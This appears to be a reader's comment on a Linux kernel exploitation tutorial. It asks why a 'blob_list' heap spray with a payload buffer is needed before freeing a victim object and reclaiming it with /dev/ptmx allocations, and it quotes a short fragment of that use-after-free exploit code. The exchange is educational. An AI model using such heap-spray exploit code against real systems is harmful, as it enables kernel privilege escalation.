Hey there, but I just couldn't get the write primitive there..
I get why we delete the victim then spray, but why should we spray(?) the blob_list as well? and why should we pass the payload(buf) to it?

for (int i = 0; i < 0x100; i++) { add(buf, 0x400); } del(victim); for (int i = 0; i < 0x10; i++) { ptmx[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY); if (ptmx[i] == -1) fatal("/dev/ptmx"); } copy.src = (unsigned long)buf; break;

thanks for your great content, keep it up!